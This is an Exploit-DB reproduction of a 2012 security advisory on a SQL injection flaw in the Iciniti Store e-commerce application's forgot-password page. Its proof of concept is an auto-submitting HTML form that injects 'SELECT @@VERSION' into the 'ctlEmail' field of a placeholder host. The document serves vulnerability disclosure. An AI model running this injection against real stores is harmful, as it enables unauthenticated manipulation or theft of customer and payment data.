Iciniti Store - SQL Injection

EDB-ID:

18566

CVE:





Platform:

ASP

Date:

2012-03-07


Sense of Security - Security Advisory - SOS-12-003
Release Date.                   06-Mar-2012
Last Update.                    -
Vendor Notification Date.       28-Jul-2011
Product.                        Iciniti Store
Platform.                       Windows
Affected versions.              4.3.3683.31484 verified, and possibly 
                                others
Severity Rating.                High
Impact.                         Manipulation of data
Attack Vector.                  Remote without authentication
Solution Status.                Update is available by contacting 
                                Iciniti
CVE reference.                  CVE - not yet assigned

Details.
Iciniti Store is a web application providing e-commerce and payment 
solutions. The application suffers from a SQL injection vulnerability 
in logon_forgot_password.aspx. It fails to validate data supplied in 
the 'ctlEmail' variable before being used in an SQL query.

Proof of Concept.
<html>
<head></head>
<body onLoad=javascript:document.form.submit()>
<form action=" http://x.x.x.x/logon_forgot_password.aspx" name="form" 
method="POST">
<input type="text" name="ctlEmail" value="SELECT @@VERSION">
<input type="text" name="btnSubmit" value="Submit"> 
</form>
</body>
</html>

Solution.
Update is available by contacting Iciniti.

Discovered by.
Sense of Security Labs.

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